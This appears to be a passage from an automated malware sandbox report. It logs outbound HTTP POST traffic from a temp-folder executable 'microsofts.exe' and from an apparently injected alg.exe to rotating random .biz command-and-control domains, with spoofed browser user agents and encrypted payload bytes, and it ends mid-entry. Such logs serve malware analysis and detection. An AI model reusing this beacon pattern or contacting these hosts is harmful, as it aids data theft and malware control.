Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:17.027776003 CEST	350	OUT	POST /kngubkdkj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:17.027801991 CEST	826	OUT	Data Raw: 1a 6b 2e af fc 12 8a e5 2e 03 00 00 1e 56 ab 9c 10 c4 4a 61 92 b3 1f e7 06 3f f4 45 a9 5e 66 f1 be 84 c7 09 80 70 3d 52 59 41 67 02 16 52 af fb 2b 1a 97 67 24 18 28 79 6f 9d 35 e3 77 53 55 89 d6 6e b6 5c 06 d5 6d 54 96 5d db 69 41 6b 6e 6c 9b 97 Data Ascii: k..VJa?E^fp=RYAgR+g$(yo5wSUn\mT]iAknleKlI%4)z<@IAWatb{T`c"5+hJWYK_McB66u]7T8&Ue@(3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49740	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:17.046343088 CEST	344	OUT	POST /d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:17.046380043 CEST	778	OUT	Data Raw: a0 eb a5 d4 a3 d1 66 78 fe 02 00 00 29 a9 b4 81 76 9a 8e 9e 69 e3 6b fe 01 70 d1 97 c9 c1 bf 4a c4 78 e6 f0 36 a3 be 82 e3 96 96 f2 0a 3f e2 ea a1 8b 6d 44 60 8a d9 d5 ed c2 1d 89 2d bf 2b 1e 2b 23 33 0b 94 1f e7 87 48 6e d3 b8 84 8f ef f5 fc 59 Data Ascii: fx)vikpJx6?mD`-++#3HnYp0q/e5XW`KoB\fKI'-JidTA.bnX%u+MZPBPLq$koB![+'JL]Dm$@Ea{h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49743	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:17.991776943 CEST	345	OUT	POST /smyj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:17.991797924 CEST	826	OUT	Data Raw: e3 9e 28 47 e6 84 e7 fd 2e 03 00 00 28 c1 36 45 70 41 29 34 ca 3d b9 4d 4e 43 f8 41 2d 63 d6 c8 94 65 2d 14 c9 31 88 ae 13 c7 0d 39 a4 9e 65 ca ce ad 37 37 14 64 92 7c 39 86 7d 4a ff 0c 2d 41 d2 9b f9 8d 48 f6 67 90 a1 f4 a0 2b f1 ea 35 03 87 85 Data Ascii: (G.(6EpA)4=MNCA-ce-19e77d\|9}J-AHg+54>5t=s^4c:!lxc%/x26z'N`Z;t[u&*e#MP5[V;~2M>k`14nvyL{bs:E)Sza4P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49744	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:18.659461975 CEST	351	OUT	POST /jvvbexlpmq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:18.659502029 CEST	778	OUT	Data Raw: 5a 1c 44 79 02 59 2b 22 fe 02 00 00 ec 9e 55 a5 48 3e 67 4a f2 c3 44 fa 9d fc b9 ad 6b eb 36 42 e2 3f 85 db ee 63 83 74 04 56 17 3d e6 ad b5 99 ac 4e 7e c2 36 d7 bb a9 9a 7f 42 5a 3a 05 90 e0 0c fa cc 61 55 94 4b 5b 62 f4 53 e7 74 f0 3d c5 8c a1 Data Ascii: ZDyY+"UH>gJDk6B?ctV=N~6BZ:aUK[bSt=Q5`J\|~8) F5 X\'DB,Ov$x;>M)5m,L YuZ(hq\|{G_Je[?zzDBE.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49745	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:19.078810930 CEST	347	OUT	POST /vpc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:19.078820944 CEST	826	OUT	Data Raw: c2 8a e9 16 66 e2 5a 9a 2e 03 00 00 c2 b7 0b e7 af 42 d6 e8 cc 74 c0 b4 5f 2e 61 a8 c6 92 db 41 d1 44 de 11 e0 bb fc 51 f6 67 2c 8d bf e4 11 fe 95 cb 7b 9e 01 5d c9 a1 f5 f3 dd eb 92 a9 cd a7 74 cf 2a b3 a7 a1 19 f5 02 75 59 fd 0b e2 4d ee 99 e4 Data Ascii: fZ.Bt_.aADQg,{]tuYMjn7r?5oe(?ov}-a(r-j`siPWBQXo86pNTzG?"tDD-\|<\|,y_0_i\|]$n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:19.745899916 CEST	348	OUT	POST /xefutga HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:19.746212006 CEST	778	OUT	Data Raw: 66 61 8a 74 79 4b a2 ea fe 02 00 00 ec 88 7b 83 00 7b 8a 06 ac f4 ce b8 28 3c 08 e7 4f cc 7f 96 89 25 11 d4 d2 47 0b cb 0c ea cd f0 31 dd de 19 6e e6 6d 71 69 62 b6 6f ef 0c 94 ad d1 de 3a 6b 06 4d 1d fe f5 d3 cd 37 cf 28 83 ad b5 aa 03 74 15 e6 Data Ascii: fatyK{{(<O%G1nmqibo:kM7(t&fDzd6" m6n[d01PP`g)(5(=H#-:;XmPUNHzfqxT)HcPGeQO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:19.987498999 CEST	358	OUT	POST /jhywesavwlgnui HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:19.987515926 CEST	826	OUT	Data Raw: 4d d2 e4 00 26 f7 ac 47 2e 03 00 00 25 86 08 83 4f 50 02 2d b2 f7 ee 41 2a 6b e0 9b 69 dc 39 bc f8 55 4d 3c f6 19 9e ba 40 96 64 33 af 71 24 13 17 b5 cc 40 5e 23 c3 44 44 d5 6f 83 3d 52 9d 6e a5 04 0d fd a0 91 82 90 1d 07 0f c9 e6 68 0e 8d 49 1b Data Ascii: M&G.%OP-A*ki9UM<@d3q$@^#DDo=RnhIic\RJ!2&zm,(%+"u:4Dk7brJ`UR ho'hdSxMh`$K-Z97sg<d/F]JK#Uc?\N~=]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49751	44.221.84.105	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:20.801692009 CEST	353	OUT	POST /vuxecawgb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:20.801692963 CEST	778	OUT	Data Raw: 09 1a ca 85 9e 65 0b 9b fe 02 00 00 d7 b4 16 6b 6f 26 41 95 0f 98 f2 8d 81 30 a8 f8 da 71 91 42 9e 42 cb 7d 33 a0 3e 8f c0 65 0a 98 74 bc 12 19 ff 0e 03 8f ca 8a 54 ed 26 f4 ae 11 ab 09 5f 2d 31 64 a6 d6 0f 21 43 7e 9f ff 75 41 ba 3e 64 5e b7 92 Data Ascii: eko&A0qBB}3>etT&_-1d!C~uA>d^xd%`g\|DdU*bAbn"d$Zo,eCzMf\|.w\eQ] )yz+64(_g9{&9R7+>Fq:yg^C6H8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	44.221.84.105	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:21.111819983 CEST	349	OUT	POST /jeppo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:21.111819983 CEST	778	OUT	Data Raw: 84 e6 a0 83 9a 3f 00 63 fe 02 00 00 d4 f2 ff 4d 11 ee 3c 3b 2f 49 8f 6d 86 95 d6 81 27 5d 1e 54 94 82 a2 4f 5e 25 55 fd 22 f4 64 23 96 6b f3 59 69 8b b9 48 63 0c 27 a7 91 85 14 f6 ea 3a 38 9f 21 3a 27 45 1e d9 0d e5 c6 eb c3 bc 97 b8 2d 3c d5 05 Data Ascii: ?cM<;/Im']TO^%U"d#kYiHc':8!:'E-<T:o:a2pK tlCXkbPgN+:Mdmjii2Yy>\|gT1NvE@;1$}Vf`r(R/iVHm5,6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	172.234.222.143	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:22.186930895 CEST	356	OUT	POST /qdsfjdjxkwbsc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:22.186969995 CEST	778	OUT	Data Raw: 5b 65 63 89 68 c5 f0 20 fe 02 00 00 3c be 1c dc e3 71 15 4c b5 a6 7a c7 f1 83 a8 b3 0f c0 92 0d 8b 91 02 64 6a 60 8a 83 1b cf 35 c0 bc fc 59 ea 63 f5 b8 b4 cc e0 ed 33 79 21 fb 63 da e8 a0 2a 4f 75 7f a6 46 5e 8c 88 8a 8b 8b 94 8a 41 d5 6e f4 00 Data Ascii: [ech <qLzdj`5Yc3y!c*OuF^AnGe PH7fE`2Z3Gt$:"`NyY'"0Z7KQ[[dJ(Y#>s{F6-iq^Xxpd14&-<a{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49757	172.234.222.143	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:23.171994925 CEST	352	OUT	POST /gkcaxlxcn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:23.172012091 CEST	778	OUT	Data Raw: 68 c3 ab ba 27 49 14 cf fe 02 00 00 ae ff 1d bf c1 ea bb 8d 24 b7 81 af 1c 60 dc 69 eb 8a 13 bf 14 86 39 1a bd 59 69 db c4 ed 67 31 7f c7 74 a0 8a 33 a7 f2 42 08 45 31 19 2d 95 c1 d1 af 70 9d bd ad 49 df be 1e e3 2f 96 80 5f 0d ab 70 ab f1 9a dd Data Ascii: h'I$`i9Yig1t3BE1-pI/_pX8na\|Sy6x- CxOLSWJwqXIr;=v/eW3yv#Stn=?>f;ks';%2E6pt-A:2'TtJNyI,#\|9%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49758	172.234.222.138	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:23.970784903 CEST	359	OUT	POST /iweslplsltjuljus HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:23.970807076 CEST	826	OUT	Data Raw: 4f a5 b5 40 9d fe 23 ca 2e 03 00 00 1c 80 b6 b0 80 a5 0b 99 30 14 a7 c9 bc 8a a3 7e 58 0e 31 90 ac e3 34 2f 58 11 ff 0d 13 54 eb f5 3f 7d 45 08 a6 b7 5b 3b 34 87 71 b2 b5 93 62 83 3a 57 10 5b f1 03 67 c1 33 da 8f 86 bb b6 b4 72 34 3d a2 5a ed 1c Data Ascii: O@#.0~X14/XT?}E[;4qb:W[g3r4=Z1NxlM@uNk62`B0XG&GFk:h6=`\iJpi! R%itdMYR+@#b*Kz'NMse_HY&<DO\|04ZUI5RC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49759	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:24.209660053 CEST	357	OUT	POST /vuaobjwmdbxko HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:24.209671974 CEST	778	OUT	Data Raw: 23 1c c7 b4 12 b2 16 cf fe 02 00 00 cb 99 17 7b e8 c7 1c a4 ee 17 5d b4 8f b4 68 41 0a c2 16 1a 8c 34 be 19 1e 61 af a9 d8 22 22 ee 83 55 9f f5 42 b1 c5 ce 93 72 d8 3e f9 7b 66 42 64 74 ba af a6 a0 58 89 09 a0 b7 06 7a 01 19 a6 9f d8 74 ea 87 1c Data Ascii: #{]hA4a""UBr>{fBdtXztw7QWtO:OE7Q76GQKgt:N&kSOz'6&.G+aU>PmIcPTvclZaL+32-$D(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49762	172.234.222.138	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:24.882385969 CEST	347	OUT	POST /rvac HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:24.882407904 CEST	826	OUT	Data Raw: f3 4c 60 3b 19 22 4e 64 2e 03 00 00 38 70 f1 fb 34 8d 68 6a b9 08 7a f0 39 0b b1 7c 74 12 02 76 58 4f 08 99 48 f6 f9 ae 53 e6 fd 80 ff 24 6c b5 cf 06 14 df b3 b7 c7 64 66 f1 6b 35 a5 44 68 65 dd c5 d0 c9 09 7e 30 74 ce 2c c9 cb e6 58 1a c7 77 e6 Data Ascii: L`;"Nd.8p4hjz9\|tvXOHS$ldfk5Dhe~0t,Xw%GJBm(rQ@#F{G 7{e]AN<(aVv'5&Jl~#]:yN\|B8PCku$ [bi=V5!@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49763	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:26.013731956 CEST	360	OUT	POST /vdlffosnapnrfupl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:26.013766050 CEST	778	OUT	Data Raw: df 30 2b 23 75 fe 57 22 fe 02 00 00 a9 59 42 f5 e9 f4 2b 0b e6 cb 3c 01 7a 72 26 a4 24 fc ca 7a 86 20 41 72 60 88 a3 3b d1 86 13 d6 89 3d 2c 2f 53 2e d6 dc 34 a2 ab 4e dc d2 29 20 62 d9 91 88 4f 30 78 81 40 cd 6c 1f e7 b0 05 e5 85 81 da 76 2a e2 Data Ascii: 0+#uW"YB+<zr&$z Ar`;=,/S.4N) bO0x@lv*s7AtO\|ZO7\(>O4Z+?oi.\[f}3r#C3JdXAvb$skBuT"5sbeL[M4Ww/OI:q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:26.050961971 CEST	357	OUT	POST /hqcfmwvkngoxo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:26.051012039 CEST	826	OUT	Data Raw: 4c eb 5b 58 e5 5e 86 85 2e 03 00 00 57 d9 30 ab 4e b3 52 be 55 9f 92 c3 b0 ed 37 51 c0 f0 14 6e 06 b2 c2 40 cb a4 37 63 cc f1 4c 70 47 26 c7 c3 9c 76 63 88 84 ad 39 c6 43 5c 75 91 cb 6b 1b c9 38 bb 7e 65 cf 58 c6 bb 2a e4 8a f1 3b 9c d1 96 89 f6 Data Ascii: L[X^.W0NRU7Qn@7cLpG&vc9C\uk8~eX;`>Gx/jkI~^$nk.#M>Q<~)iw~zl>/NW?+"+BSu_S'q6XAq3a}\|j<5~q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49766	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:27.610124111 CEST	351	OUT	POST /ehonqic HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:27.610151052 CEST	826	OUT	Data Raw: b6 1b ec ec 41 31 c5 4f 2e 03 00 00 2a ac 3b ff 6a e3 87 41 99 5c 23 c0 d8 84 01 dd 7d e4 ee 82 32 c6 b3 36 a1 9c 44 3f 96 7c 06 f8 75 bf fc 33 b7 78 d4 7f 88 35 57 e5 55 1f 6b 12 29 59 3d 58 a3 a1 c7 06 e2 ad f1 86 ca 21 18 c5 83 3b b9 88 36 dd Data Ascii: A1O.*;jA\#}26D?\|u3x5WUk)Y=X!;6h43YeR]W7{E}ip5+Fci-Lf-Oqlm~aUMOC>t mlo3,#2\f.Z-bs^P5#>i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49767	82.112.184.197	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:27.688219070 CEST	353	OUT	POST /dgdkhxcfkna HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:27.688219070 CEST	778	OUT	Data Raw: df 9b 59 3c 6b c4 ba c7 fe 02 00 00 1e 48 08 af 52 82 8b ab 19 63 d7 75 94 18 3a a8 81 cb 4b ee 36 f8 8f df 13 ce 3a d3 1f d2 c9 ec 0b cd 55 54 11 84 04 c1 db 42 73 68 7c 2d 4b 98 47 bc f2 b8 f4 23 48 eb 9a f5 46 db 80 71 c3 51 75 14 3d 06 9b a4 Data Ascii: Y<kHRcu:K6:UTBsh\|-KG#HFqQu=V'jvWnzL.ZJr'EA767ed(2]\k]K2-%CFOo.suAE7>zS<bW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49769	82.112.184.197	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:29.074515104 CEST	352	OUT	POST /yeeuocokpp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:29.074528933 CEST	778	OUT	Data Raw: e9 7c 5d 61 10 c0 a7 82 fe 02 00 00 56 85 d5 c3 bf 8a 1f 5f 6e 1c 9a b0 7c 4c ea 76 42 de 90 41 ca 09 2f 43 f9 ac e3 5b e1 74 c5 f1 72 13 bf 6d 4c 40 a2 55 46 a2 a3 80 e2 54 d0 83 94 90 dd db f6 21 f5 c1 af 1d 59 43 9b 96 a6 b3 15 05 d6 a7 74 b8 Data Ascii: \|]aV_n\|LvBA/C[trmL@UFT!YCtb1+rbU4O,k=gDCJ67IoxY$rKE@NOP:8m_YZ%-8cKadlIDZ)Vj)d$H,3~j/3C)e>#89$$\|i_r]0^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49770	82.112.184.197	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:29.199201107 CEST	355	OUT	POST /caxqycgeiaamd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:29.199202061 CEST	826	OUT	Data Raw: dc 28 31 3f c9 7b 22 e8 2e 03 00 00 74 5a 91 37 3a 00 e2 9a 20 19 cd a3 3f 52 a2 61 e7 0b 89 65 0b c0 1c 33 27 5e 5a 5b d5 37 17 dd b4 21 ff 57 d1 2b 7c 33 c9 b0 1b 41 11 b9 10 1d 74 ab 8c 41 48 71 db 83 1b 67 97 03 98 34 40 6c d8 11 b2 d6 11 df Data Ascii: (1?{".tZ7: ?Rae3'^Z[7!W+\|3AtAHqg4@lg]4`/OerH2E<$A[:~s5zx:;^"Bi<::CgS 'btHM8~r6jhsF@77(v-8&A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49773	82.112.184.197	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:33.155561924 CEST	354	OUT	POST /dhwxqyxtm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:33.155591011 CEST	778	OUT	Data Raw: 37 a8 9d 52 28 b8 fe b9 fe 02 00 00 7a 73 0f 14 bc ff 3a a1 47 9f d6 8b 8a e5 39 54 d2 92 bf 26 39 e5 e9 84 d9 9f 91 50 f8 46 df 7c 64 27 54 00 b9 fc 67 34 a5 83 1c e6 53 a5 0c ba 82 b7 7f 9b bb f3 53 75 49 d9 ef 33 f8 4a 1c 67 18 6e 6b 10 68 09 Data Ascii: 7R(zs:G9T&9PF\|d'Tg4SSuI3Jgnkh:3,4 BD)5j?(14v+!u7RijB.@@3@hs@{ H2=\|d11Xlgw!ji1ketrxjwnK1em

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49774	82.112.184.197	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:36.836272001 CEST	354	OUT	POST /ioeeuacevdof HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:36.836344957 CEST	826	OUT	Data Raw: 7b 21 f4 5c ed 89 ba 49 2e 03 00 00 83 02 4e ff f9 44 8d 5e d4 05 72 2c 16 88 5c 8b 21 7c b4 76 89 e5 77 e5 2a fd dd 92 f3 99 c3 53 e6 41 85 d7 84 7e d6 02 a5 17 9a 41 b5 47 fc 4d bd 6b 34 4a 68 17 f7 3a eb 52 c5 f9 51 d0 e2 30 84 23 36 50 1d 9a Data Ascii: {!\I.ND^r,\!\|vw*SA~AGMk4Jh:RQ0#6PdY.K6fHl8p+._IITPLo)xPKKQ-Ly;Z!DVBUlsYL`m_i($w/T~:He2x^[W`_ub!lAw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49775	82.112.184.197	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
